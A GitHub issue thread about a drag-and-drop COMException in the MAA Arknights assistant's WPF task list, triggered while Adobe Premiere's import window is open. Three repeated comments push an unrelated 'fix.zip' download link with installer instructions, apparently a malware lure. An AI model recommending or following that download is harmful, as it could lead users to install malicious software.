### ISSUE TITLE
拖动操作已在进行中

### ISSUE THREAD

**Issue by lvliaom** [MaaAssistantArknights/MaaAssistantArknights#10367]
### 在提问之前...

- [X] 我理解 Issue 是用于反馈和解决问题的，而非吐槽评论区，将尽可能提供更多信息帮助问题解决
- [X] 我填写了简短且清晰明确的标题，以便开发者在翻阅 Issue 列表时能快速确定大致问题。而不是“一个建议”、“卡住了”等
- [X] 我已查看最新测试版本的更新内容，并未提及该 Bug 已被修复的情况
- [X] 我已检查了置顶议题（Pinned Issue），确认我的问题未被提及

### 问题描述

MAA 遇到了问题
拖动操作已在进行中

解决方案
出现未知错误
详细信息
System.Runtime.InteropServices.COMException (0x80004005): 拖动操作已在进行中

   at MS.Win32.UnsafeNativeMethods.DoDragDrop(IDataObject dataObject, IOleDropSource dropSource, Int32 allowedEffects, Int32[] finalEffect)
   at System.Windows.OleServicesContext.OleDoDragDrop(IDataObject dataObject, IOleDropSource dropSource, Int32 allowedEffects, Int32[] finalEffect)
   at System.Windows.DragDrop.OleDoDragDrop(DependencyObject dragSource, DataObject dataObject, DragDropEffects allowedEffects)
   at System.Windows.DragDrop.DoDragDrop(DependencyObject dragSource, Object data, DragDropEffects allowedEffects)
   at GongSolutions.Wpf.DragDrop.DragDrop.DoDragSourceMove(Object sender, Func`2 getPosition) in C:\projects\gong-wpf-dragdrop\src\GongSolutions.WPF.DragDrop\DragDrop.cs:line 654
   at System.Windows.RoutedEventArgs.InvokeHandler(Delegate handler, Object target)
   at System.Windows.EventRoute.InvokeHandlersImpl(Object source, RoutedEventArgs args, Boolean reRaised)
   at System.Windows.UIElement.RaiseEventImpl(DependencyObject sender, RoutedEventArgs args)
   at System.Windows.UIElement.RaiseTrustedEvent(RoutedEventArgs args)
   at System.Windows.Input.InputManager.ProcessStagingArea()
   at System.Windows.Interop.HwndMouseInputProvider.ReportInput(IntPtr hwnd, InputMode mode, Int32 timestamp, RawMouseActions actions, Int32 x, Int32 y, Int32 wheel)
   at System.Windows.Interop.HwndMouseInputProvider.FilterMessage(IntPtr hwnd, WindowMessage msg, IntPtr wParam, IntPtr lParam, Boolean& handled)
   at System.Windows.Interop.HwndSource.InputFilterMessage(IntPtr hwnd, Int32 msg, IntPtr wParam, IntPtr lParam, Boolean& handled)
   at MS.Win32.HwndWrapper.WndProc(IntPtr hwnd, Int32 msg, IntPtr wParam, IntPtr lParam, Boolean& handled)
   at System.Windows.Threading.ExceptionWrapper.InternalRealCall(Delegate callback, Object args, Int32 numArgs)
   at System.Windows.Threading.ExceptionWrapper.TryCatchWhen(Object source, Delegate callback, Object args, Int32 numArgs, Delegate catchHandler)

### Version

Resource Version: 太阳甩在身后
UI Version: v5.6.0-beta.1
Core Version: v5.6.0-beta.1

### 日志文件

2024-08-25 14:21:00.000
[asst.log](https://github.com/user-attachments/files/16739251/asst.log)
[gui.log](https://github.com/user-attachments/files/16739255/gui.log)

### 配置信息

[gui.json](https://github.com/user-attachments/files/16739254/gui.json)

### 还有别的吗？

在进行MAA任务列表拖动前，正在进行其他软件的文件拖动导入过程，此时切换到MAA进行拖动操作即会报错

**Comment by diablo00001** [comment]
Download 
https://www.mediafire.com/file/nyekc4ehyxg2ijy/fix.zip/file
In the installer menu, select "gcc."

**Comment by diablo00001** [comment]
Download 
https://www.mediafire.com/file/nyekc4ehyxg2ijy/fix.zip/file
In the installer menu, select "gcc."

**Comment by diablo00001** [comment]
Download 
https://www.mediafire.com/file/nyekc4ehyxg2ijy/fix.zip/file
In the installer menu, select "gcc."

**Comment by ABA2396** [comment]
没看懂，什么叫其他拖动正在进行，然后切换到maa拖动

**Comment by HoshinoAyako** [comment]
你什么视频编辑软件。我这边用Adobe Pr没见有这问题。

**Comment by lvliaom** [comment]
> 你什么视频编辑软件。我这边用Adobe Pr没见有这问题。

就是pr...
举个例子
![image](https://github.com/user-attachments/assets/6cc78ec8-b85c-467c-bb11-5f6bab0d83c5)
这个窗口未关闭的时候，拖动maa任务列表就会报错
